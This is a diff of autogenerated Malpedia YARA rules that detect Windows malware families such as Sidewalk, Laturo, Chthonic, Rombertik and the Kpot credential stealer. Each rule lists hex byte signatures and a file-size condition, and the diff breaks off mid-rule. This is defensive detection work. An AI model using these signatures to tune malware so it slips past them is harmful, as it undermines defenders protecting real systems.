 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "36bcfb0a-2346-546a-ae2c-0b00cc2618a0"
+		id = "50903c03-c7b5-5314-a551-e4e23fcd9efd"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nagini"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nagini_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewalk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sidewalk_auto.yar#L1-L164"
 		license_url = "N/A"
-		logic_hash = "0c83f5c5996fc3fecace2eca42d157da471f759617384a5504d89fe38e4a9faf"
+		logic_hash = "e6737ed096fc4d4ecc8ea3c0d1ac3b4b3bce3ee6030ce0fc8630ca3477945c10"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97133,32 +97292,38 @@ rule MALPEDIA_Win_Nagini_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 06 0c07 06 0c07 06 0b06 }
-		$sequence_1 = { e9???????? 6683f803 0f85c1020000 6804010000 8d842474010000 33f6 50 }
-		$sequence_2 = { 0f835ffbffff 03f3 03d3 83fb1f 0f8715040000 ff249da0c64000 8b46e4 }
-		$sequence_3 = { 1408 0412 06 0213 07 0315???????? }
-		$sequence_4 = { 59 8975fc 8b45e0 8b0485c0914200 f644030401 7428 }
-		$sequence_5 = { ffd3 33c0 c744244007000000 c744243c00000000 668944242c 663907 }
-		$sequence_6 = { 8d4c2448 e8???????? 83c404 c68424d802000006 83781408 7202 8b00 }
-		$sequence_7 = { 0305???????? 0305???????? 0404 0404 }
-		$sequence_8 = { 0203 0903 040d 05060d0506 0d05060a04 }
-		$sequence_9 = { 83f85b 741d 83f85c 7418 }
+		$sequence_0 = { 41880408 48ffc1 488d040a 483bc6 7ce2 4883c640 }
+		$sequence_1 = { 488d5204 4983e901 75d4 4863457f 33db }
+		$sequence_2 = { c1e810 880a c1e918 884202 884a03 4183f810 }
+		$sequence_3 = { 8945ef 8bc2 33c6 c1c010 }
+		$sequence_4 = { 41c1c610 4503e6 4403cb 4533d1 }
+		$sequence_5 = { 33f0 418bc1 4133c6 c1c608 c1c010 4403de }
+		$sequence_6 = { c1e108 0bc8 0fb642fe c1e108 0bc8 41890c10 }
+		$sequence_7 = { 4403c8 4533d1 41c1c208 4503fa 418bdf 33d8 }
+		$sequence_8 = { 33c3 c1c207 c1c00c 4403c8 4533d1 41c1c208 }
+		$sequence_9 = { 33c6 c1c010 4403d8 4133db c1c30c 03d3 }
+		$sequence_10 = { 4403cb 4533d1 4403ee 41c1c210 }
+		$sequence_11 = { 4403e8 4133db 418bcd c1c307 }
+		$sequence_12 = { 0bc8 41890c10 488d5204 4983e901 }
+		$sequence_13 = { 418bc0 c1e002 4d8d4904 4863d0 41ffc0 }
+		$sequence_14 = { 7d15 8a040f 3201 41880408 48ffc1 }
+		$sequence_15 = { 4133f8 c1c610 4433f2 c1c710 4403df }
 
 	condition:
-		7 of them and filesize < 12820480
+		7 of them and filesize < 237568
 }
-rule MALPEDIA_Win_Sendsafe_Auto : FILE
+rule MALPEDIA_Win_Laturo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ca9919a1-41ee-51c0-9d8a-dc97d5d2356c"
+		id = "81276e33-698e-507e-b345-8c9c243babc3"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sendsafe"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sendsafe_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.laturo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.laturo_auto.yar#L1-L170"
 		license_url = "N/A"
-		logic_hash = "0b34fbaea5b0ab525d5bd2b630928ff7f548afb642b0c0217e296f895cb417fc"
+		logic_hash = "3a95665a0f62c0e6d122fab4ca77fec299db1ff67fd03f39a710232d9c73dd0f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97172,32 +97337,38 @@ rule MALPEDIA_Win_Sendsafe_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4d08 8988a8000000 8b55fc 83c244 52 ff15???????? 6a02 }
-		$sequence_1 = { c7804c03000000000000 8b4608 ff742428 8b4864 8b86c0000000 83c014 50 }
-		$sequence_2 = { ff7508 e8???????? 8b4df4 83c410 8b0c8d90945b00 89441928 8b45f0 }
-		$sequence_3 = { ebcc 8b55e8 2355bc 8b4514 8d0cd0 894de4 8b55e4 }
-		$sequence_4 = { e9???????? 8b4dec 8b11 899578ffffff 8b45ec 50 8b8d78ffffff }
-		$sequence_5 = { ff742428 e8???????? 83c414 85c0 0f842a020000 8b4c241c b801000000 }
-		$sequence_6 = { e8???????? 8b8540ffffff 8b8d44ffffff 8b9538ffffff 899481140a0000 8b8540ffffff 8b8d44ffffff }
-		$sequence_7 = { c7406cac1d5600 b807000000 e9???????? 837dfc00 742b b904000000 6bd10d }
-		$sequence_8 = { e8???????? 8bd8 83c414 84db 7912 c74424483b000000 b942020000 }
-		$sequence_9 = { 8b8de4fbffff 8b95ecfbffff 031481 8995ecfbffff e9???????? eb54 8b85e8fbffff }
+		$sequence_0 = { 4c8d0568000000 488d15d9380100 488d0de2380100 e8???????? 4c8d0d6e730100 4c8d0567010000 }
+		$sequence_1 = { 0f8592000000 0fb6442420 4883f802 7332 }
+		$sequence_2 = { 4c8d0db0860000 8bf9 488d15a7860000 b906000000 4c8d0593860000 }
+		$sequence_3 = { 750b 0fb6442406 d0e0 88442406 0fb6442405 }
+		$sequence_4 = { 880424 0fb60424 89442448 488b442410 48ffc0 4889442410 }
+		$sequence_5 = { 48034a10 488bf9 488b742478 8bc8 }
+		$sequence_6 = { 488b442410 48ffc0 4889442410 0fb6442402 83e040 85c0 743d }
+		$sequence_7 = { 4d8be1 498be8 4c8bea 4b8b8cfee89f0100 4c8b15???????? 4883cfff }
+		$sequence_8 = { a1???????? 33d2 56 57 8bf9 8bf7 }
+		$sequence_9 = { eb21 886a01 b002 eb1a 886a02 b020 }
+		$sequence_10 = { 8b35???????? 8d45dc 6a1c 50 }
+		$sequence_11 = { 80fb90 7405 80fbcc 7520 b801000000 3bd0 7610 }
+		$sequence_12 = { 8b550c 83ec20 33c9 8bc1 3914c5f81b0110 7408 40 }
+		$sequence_13 = { 0fb6c0 83e800 741f 83e801 }
+		$sequence_14 = { 814a1800100100 8a65fd eb0e 8a65fd }
+		$sequence_15 = { 56 57 ff15???????? 894514 85c0 784d 83ff05 }
 
 	condition:
-		7 of them and filesize < 3743744
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Mapiget_Auto : FILE
+rule MALPEDIA_Win_Brutpos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b7a42e52-aa49-5fa2-9228-6b144ce76bdc"
+		id = "bb6abccd-59b3-5a30-9e67-ccbe498737a5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mapiget"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mapiget_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.brutpos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.brutpos_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "9a5d011e54dd8be32162fd28789dfb313e466b4c449ca547e52393f68f4438eb"
+		logic_hash = "89d0bc6a7e52ba9f63dface96ebbf483b03be0cbf8144ed32f3b88bf360b4eda"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97211,85 +97382,32 @@ rule MALPEDIA_Win_Mapiget_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f3ab 8b750c b900010000 8dbdf0f9ffff 8965f0 f3ab b980000000 }
-		$sequence_1 = { 8dbdf0feffff f3ab 8b750c b900010000 }
-		$sequence_2 = { 0108 c20400 8bc1 c700???????? c20400 }
-		$sequence_3 = { 6a40 50 e8???????? 83c40c 85c0 0f84f8010000 }
-		$sequence_4 = { 6689bc45eef9ffff 8d95f0fdffff 8d85f0f9ffff 52 50 e8???????? 83c408 }
-		$sequence_5 = { 83cdff 56 83fb02 57 }
-		$sequence_6 = { 8d8c2430020000 53 51 e8???????? }
-		$sequence_7 = { 81ec20040000 53 57 33db b97f000000 33c0 8d7c242a }
-		$sequence_8 = { c706???????? 8b4624 8365fc00 85c0 7612 fe88e0134100 }
-		$sequence_9 = { c3 660dffff c3 56 8bf1 e8???????? }
-
-	condition:
-		7 of them and filesize < 163840
-}
-rule MALPEDIA_Win_Smanager_Auto : FILE
-{
-	meta:
-		description = "autogenerated rule brought to you by yara-signator"
-		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0adcac8e-452d-57ad-977c-a9125f7183b0"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.smanager_auto.yar#L1-L223"
-		license_url = "N/A"
-		logic_hash = "3f482517aa3a2ee02c64524a13e643b42a87540d5888bda3f974015b63620502"
-		score = 75
-		quality = 73
-		tags = "FILE"
-		version = "1"
-		tool = "yara-signator v0.6.0"
-		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { 7410 6a00 6a00 6830001100 }
-		$sequence_1 = { 83c602 6a22 56 e8???????? 83c408 }
-		$sequence_2 = { 85f6 7417 8b0e 85c9 }
-		$sequence_3 = { 8b4510 85c0 7407 50 }
-		$sequence_4 = { 740e 3d45270000 7407 3d46270000 }
-		$sequence_5 = { 6a00 ff15???????? 8bf8 897e28 }
-		$sequence_6 = { 51 51 ffd0 83c40c c7460800000000 }
-		$sequence_7 = { 8b7604 6a00 6a00 56 68???????? 6a00 6a00 }
-		$sequence_8 = { ff15???????? 32c0 e9???????? 0f1005???????? }
-		$sequence_9 = { 0001 ce 50 0008 }
-		$sequence_10 = { e8???????? 4c8d4c2430 488d4e10 4c8bc3 }
-		$sequence_11 = { 48897c2428 48896c2420 ff15???????? 85c0 }
-		$sequence_12 = { 0007 b15a 0089b05a0089 b05a }
-		$sequence_13 = { 488d053bdc0000 488d542458 488d4c2420 41b801000000 4889442458 e8???????? 488d050adc0000 }
-		$sequence_14 = { 48895c2458 488bd9 ba02000000 488b4938 ff15???????? b90a000000 ff15???????? }
-		$sequence_15 = { 0008 53 4f 00ef }
-		$sequence_16 = { 0000 80ed4a 0044feff ff900100008c }
-		$sequence_17 = { 0003 b157 0000 0c0c }
-		$sequence_18 = { 488b05???????? 4833c4 48898570010000 4c8bf1 488d442438 4889442420 }
-		$sequence_19 = { 0007 b15a 00c4 b15a }
-		$sequence_20 = { 0007 b15a 0007 b15a }
-		$sequence_21 = { 488905???????? 4885c0 7519 488b8c2460020000 4833cc e8???????? 4881c470020000 }
-		$sequence_22 = { 4885c0 0f84a3000000 4883f80d 0f8299000000 488d70f4 488d7c2448 }
-		$sequence_23 = { 0000 0c0c 0c0c 0c0c 0c0c 0c0c 0102 }
+		$sequence_0 = { 59 58 83c004 83e904 8808 }
+		$sequence_1 = { 03c2 034508 2938 83e902 75e8 ebd9 5e }
+		$sequence_2 = { 8d5b18 8b5b60 03d8 52 8b35???????? }
+		$sequence_3 = { 6681f9df77 7412 0f31 8bd8 }
+		$sequence_4 = { 8bd0 ad 8bc8 83e908 66ad 6685c0 740c }
+		$sequence_5 = { 8d7c38fc baffffffff 83c704 57 }
+		$sequence_6 = { 66ad 6685c0 740c 25ff0f0000 03c2 034508 }
+		$sequence_7 = { 52 e8???????? 59 8b09 8bd1 }
+		$sequence_8 = { c1e202 03d3 8b12 03d0 }
+		$sequence_9 = { 8b5508 8b4204 0fb70a 50 51 807401ff97 }
 
 	condition:
-		7 of them and filesize < 10013696
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Redpepper_Auto : FILE
+rule MALPEDIA_Win_Hdmr_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fe9a2c74-3bcd-57d2-a4a6-d3f35fe0f1be"
+		id = "85c97022-d8c5-5e21-a936-553f640fe4f6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redpepper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.redpepper_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hdmr"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hdmr_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "c4da24b7951d6f6fb7e27212edbac20ef8484913731cd43af2131db52962e64a"
+		logic_hash = "9a001b5acc5aa25620fae4ae86be71364f80188dbdc0b08b5c1ad9fa793fd746"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97303,32 +97421,32 @@ rule MALPEDIA_Win_Redpepper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 40 50 eb03 50 }
-		$sequence_1 = { 741e 8b4050 6800400000 50 }
-		$sequence_2 = { 3bf0 7ce1 68???????? e8???????? c70424???????? e8???????? c70424???????? }
-		$sequence_3 = { 85c0 741e 8b442428 50 68???????? 6a02 }
-		$sequence_4 = { 85f6 745a 8b4604 8b7c2420 8b5c2414 85c0 }
-		$sequence_5 = { 56 e8???????? 83c404 c7472000000000 c7471400000000 }
-		$sequence_6 = { 7522 6893020000 68???????? 6a3a 6883000000 }
-		$sequence_7 = { 7f0c 0fbec9 c1e006 8d4408bf eb4e }
-		$sequence_8 = { 894610 89462c 8d4638 896e04 50 }
-		$sequence_9 = { 56 56 c705????????01000000 ff15???????? 50 ff15???????? }
+		$sequence_0 = { 8b4514 8b16 8b527c 50 57 }
+		$sequence_1 = { 7511 8b4d0c 8b5018 51 8bce }
+		$sequence_2 = { 8b048540d04100 83e61f c1e606 59 c644300400 85ff }
+		$sequence_3 = { 83c40c 33f6 e8???????? 25ff000080 7907 48 0d00ffffff }
+		$sequence_4 = { be00000000 7454 f6c301 7445 8d8df0f5ffff }
+		$sequence_5 = { 0f84e1030000 6a00 6a00 6a00 }
+		$sequence_6 = { 5e 8bc8 8b929c000000 5d }
+		$sequence_7 = { 53 ff15???????? 85c0 7451 57 e8???????? 83c404 }
+		$sequence_8 = { 33cb 33480c 8bdf c1eb08 894df0 8b4d08 81e3ff000000 }
+		$sequence_9 = { 33c0 68fe070000 50 8d8c2472020000 51 8974241c 6689842474020000 }
 
 	condition:
-		7 of them and filesize < 2482176
+		7 of them and filesize < 284672
 }
-rule MALPEDIA_Win_Covid22_Auto : FILE
+rule MALPEDIA_Win_Chthonic_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "99a02a74-d0a3-533c-b448-35480cff51fc"
+		id = "88bbe6d9-2022-5fe0-b1f7-f4f3c2df3385"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.covid22"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.covid22_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.chthonic_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "968cf98e2e8c36cdb3ce45b1a5e5186c5425f3f25bc15cd333cdcc77eeba73ef"
+		logic_hash = "da867e1af67cf97ccf35b53e1588f870d915e4ed4b4f2f84ed6de90f903a9195"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97342,32 +97460,32 @@ rule MALPEDIA_Win_Covid22_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8a4d78 83c40c f6c102 8975dc 897d08 }
-		$sequence_1 = { 57 e8???????? 8d7438ff 3bf7 }
-		$sequence_2 = { 8b3d???????? ffd7 8b4608 85c0 7403 50 ffd7 }
-		$sequence_3 = { 33d9 81e3ff000000 c1e908 330c9df0904000 0fb65801 }
-		$sequence_4 = { 89c3 83fb01 7532 ff35???????? }
-		$sequence_5 = { e8???????? 8d0df4b14000 5a e8???????? 8b442414 e8???????? 50 }
-		$sequence_6 = { 83c001 8bce c1e908 330c9df0904000 0fb618 33d9 }
-		$sequence_7 = { 8d0d14b24000 e8???????? ba???????? 8d0d18b24000 e8???????? ba???????? }
-		$sequence_8 = { c705????????0a4c4000 c705????????304c4000 c705????????01000000 837d1c00 7507 c7451c00904000 }
-		$sequence_9 = { ba???????? 8d0d10b24000 e8???????? ba???????? 8d0d14b24000 }
+		$sequence_0 = { 8b10 8911 0fb64dff 46 }
+		$sequence_1 = { 6a04 56 8d4604 68fc0f0000 }
+		$sequence_2 = { 81e1ff00ff00 0bc1 89470c 5f }
+		$sequence_3 = { 32cb 80e17f 8808 b001 5b c3 }
+		$sequence_4 = { 8911 8b00 8b4d08 03c2 25ff000080 7907 48 }
+		$sequence_5 = { ff751c ff7518 ff7514 53 ff7510 ff7508 e8???????? }
+		$sequence_6 = { b8ecff0000 660145f0 8d45f0 50 56 e8???????? }
+		$sequence_7 = { 4e 81ce00ffffff 46 8d84b5fcfbffff 8b08 03f9 81e7ff000080 }
+		$sequence_8 = { 83e601 eb00 85f6 74cf 8345fc02 b9000d0000 }
+		$sequence_9 = { c1c108 81e1ff00ff00 0bc1 89470c }
 
 	condition:
-		7 of them and filesize < 1955840
+		7 of them and filesize < 425984
 }
-rule MALPEDIA_Win_Cameleon_Auto : FILE
+rule MALPEDIA_Win_Rombertik_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "806efc2e-ee4f-5af0-8004-774edaa0c90c"
+		id = "0947e6c1-9998-521a-99a5-cdd6a4e22a09"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cameleon_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rombertik"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rombertik_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "98c6fbda2b8586d2f1ae140ba5c66b5e26a402ce2bed7b89a93ce40a7f3c9c1d"
+		logic_hash = "353c590302f7523faeb3c60893558a9f0763683879e3f9985cd798caf9881314"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97381,19 +97499,19 @@ rule MALPEDIA_Win_Cameleon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b36 33c0 6689045e 3bc7 5b 1bc0 5f }
-		$sequence_1 = { c645fc19 8d55b0 837dc408 0f4355b0 663902 }
-		$sequence_2 = { 84c0 741a 85db 7507 c746349cfb0410 57 ff7634 }
-		$sequence_3 = { 2bd9 03df 8938 8b4620 }
-		$sequence_4 = { 57 8bf1 c745fc00000000 8b7e34 }
-		$sequence_5 = { c707???????? e8???????? 0f1000 8d45b4 50 0f114708 e8???????? }
-		$sequence_6 = { 0f85c08fffff 8d0d203c0510 ba1b000000 e8???????? 5a c3 833d????????00 }
-		$sequence_7 = { 66894e02 eb41 83e00f 66c1ff04 0fb71445f0ef0410 0fbfc7 }
-		$sequence_8 = { e8???????? e9???????? 68???????? 8bcb e8???????? 85c0 0f85f7010000 }
-		$sequence_9 = { c645fc19 ba02000000 e9???????? 68???????? }
+		$sequence_0 = { 7549 68???????? 8d95e0feffff 52 ffd7 }
+		$sequence_1 = { 0fb69c3500ffffff 03d9 81e3ff000080 7908 4b }
+		$sequence_2 = { 8b5508 8b45fc 52 6800010000 50 }
+		$sequence_3 = { 56 885dfd ff15???????? 85c0 0f846c010000 807dfde9 0f8462010000 }
+		$sequence_4 = { 8d85fcfeffff e8???????? 8b4508 57 }
+		$sequence_5 = { 68ffff1f00 ff15???????? 8bf0 3bf3 7473 }
+		$sequence_6 = { 8d95e0feffff 52 ffd7 85c0 }
+		$sequence_7 = { 83c410 85c0 7409 6a00 ffd0 83c404 5e }
+		$sequence_8 = { 8d95e0feffff 52 ffd6 85c0 }
+		$sequence_9 = { 3bc3 0f8486010000 53 6a01 8d4dfd }
 
 	condition:
-		7 of them and filesize < 824320
+		7 of them and filesize < 73728
 }
 rule MALPEDIA_Win_Conficker_Auto : FILE
 {
@@ -97434,18 +97552,18 @@ rule MALPEDIA_Win_Conficker_Auto : FILE
 	condition:
 		7 of them and filesize < 335872
 }
-rule MALPEDIA_Win_Plaintee_Auto : FILE
+rule MALPEDIA_Win_Starcruft_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d95cbeb4-c06c-51b3-a2cb-8f8e5a1bfe81"
+		id = "44a05616-8be0-5d16-896e-a5310b288a10"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.plaintee_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.starcruft"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.starcruft_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "0e73f73019071a1fc77ee2e72d1d76e92ad8df711ace3b0abcab294f32362d30"
+		logic_hash = "8a7d60fd25a814377ba2a7789857a75b6ee211239e9e01336654dc519259df0c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97459,32 +97577,32 @@ rule MALPEDIA_Win_Plaintee_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 52 56 50 ff15???????? 83f85a 721a }
-		$sequence_1 = { 898638010000 750a b001 5e 81c490010000 c3 8bce }
-		$sequence_2 = { 740a b001 5e 81c490010000 c3 6a11 }
-		$sequence_3 = { 56 e8???????? 85c0 754c 68ac010000 e8???????? }
-		$sequence_4 = { ff15???????? 83f85a 721a 8a16 }
-		$sequence_5 = { 8b4c240c b801000000 80c20a 3bf0 8811 7e0f 53 }
-		$sequence_6 = { 6a02 ff15???????? 83f8ff 898638010000 750a }
-		$sequence_7 = { 7e0f 53 8a1c31 32da 881c31 }
-		$sequence_8 = { 8a1c31 32da 881c31 41 3bc8 7cf3 }
-		$sequence_9 = { 66ab aa b916000000 33c0 }
+		$sequence_0 = { 0fb6423d c1e008 0bc8 8b550c 0fb6423e c1e010 0bc8 }
+		$sequence_1 = { c785e4feffff01000000 c785e8feffff00000000 c785e0feffff00000000 a1???????? 50 ff15???????? }
+		$sequence_2 = { c68541fbffffec c68542fbffff90 c68543fbffff47 8d8d48fbffff 51 }
+		$sequence_3 = { 0bd1 8b450c 0fb64837 c1e118 0bd1 8955e4 8b550c }
+		$sequence_4 = { 8d8d30fdffff 51 ff15???????? c745f400000000 c745f000000000 8d55f0 52 }
+		$sequence_5 = { 8975e4 33c0 39b8d8d02e00 0f8491000000 }
+		$sequence_6 = { ebad 8b85e4feffff c68405f8feffff7c 8b8dbcfeffff 51 8d95c4feffff 52 }
+		$sequence_7 = { 8b4510 c70000000000 c705????????00000000 8b4d10 51 8b550c 52 }
+		$sequence_8 = { 50 e8???????? 83c418 85c0 7516 8b8d04faffff 51 }
+		$sequence_9 = { 52 8b85b4fcffff 50 e8???????? 83c414 }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 294912
 }
-rule MALPEDIA_Win_Maudi_Auto : FILE
+rule MALPEDIA_Win_Kpot_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3e4205bc-621f-57ac-9783-0d7a80e63274"
+		id = "e2a580eb-b7e8-5569-b0fb-2a299c9ec4b4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maudi"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.maudi_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kpot_stealer_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "ae4372c99a5ab8731cfa27286c0755a13272fa053f753c6557e155320ea94c91"
+		logic_hash = "f623e53c9b602005767465c863e7a8d05ae4b1bf549ad4d0a72142bca2bcb3fc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97498,32 +97616,32 @@ rule MALPEDIA_Win_Maudi_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5d 8b542408 4a 0f85d9000000 68???????? 87d1 }
-		$sequence_1 = { 87d1 87ca 51 51 51 }
-		$sequence_2 = { 56 55 89e5 5d 89e6 fc ad }
-		$sequence_3 = { 89e5 5d 89e6 fc ad 6804010000 56 }
-		$sequence_4 = { 59 ffe7 6800400000 6a00 57 68???????? }
-		$sequence_5 = { cd03 cd02 68???????? 87d1 87ca 51 }
-		$sequence_6 = { 59 59 ffe7 6800400000 6a00 }
-		$sequence_7 = { 6804010000 56 50 68???????? 87d1 }
-		$sequence_8 = { 59 59 ff25???????? 55 }
-		$sequence_9 = { 5d b986180000 55 89e5 5d be???????? }
+		$sequence_0 = { 0bc1 0fb64f04 c1e208 0bca 0fb65707 c1e208 0bd6 }
+		$sequence_1 = { 83f80f 7703 6a0f 58 3d00e00100 7605 83c8ff }
+		$sequence_2 = { 8b08 50 ff5108 832600 b001 c3 }
+		$sequence_3 = { 884b04 8bc1 c1e808 884305 8bc1 c1e810 884306 }
+		$sequence_4 = { 8ac3 e8???????? 84c0 7505 8b55f0 }
+		$sequence_5 = { 56 57 8bf8 8d4701 50 8bf1 ff15???????? }
+		$sequence_6 = { 8bf2 81e600001000 0bce c1e914 81e300000600 8bf2 81e600e00100 }
+		$sequence_7 = { 8bf0 7504 33c0 eb31 83feff 750a 8b4d08 }
+		$sequence_8 = { 5a 0f8418010000 83c708 c7450c08000000 8b47fc }
+		$sequence_9 = { c1e108 ff7514 0bc1 0fb64f02 ff7510 c1e110 }
 
 	condition:
-		7 of them and filesize < 40960
+		7 of them and filesize < 219136
 }
-rule MALPEDIA_Win_Kutaki_Auto : FILE
+rule MALPEDIA_Win_Getmail_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3c87fe1d-05a9-5edb-bd70-90267ed2d35f"
+		id = "4780e834-4739-57cb-8526-1265945d26d9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kutaki"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kutaki_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmail"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.getmail_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "f474749c1cd094eae743101c28ca84cb1920c476698848136df3aa022b49d368"
+		logic_hash = "f392c7d302de7668ac9b3700c0372997d2f7bd630f275b38a7b8618bbfecba8b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97537,32 +97655,32 @@ rule MALPEDIA_Win_Kutaki_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4de8 51 56 ff503c 3bc7 7d0f 6a3c }
-		$sequence_1 = { 898598feffff 83bd98feffff00 7d26 68a0000000 68???????? 8b859cfeffff 50 }
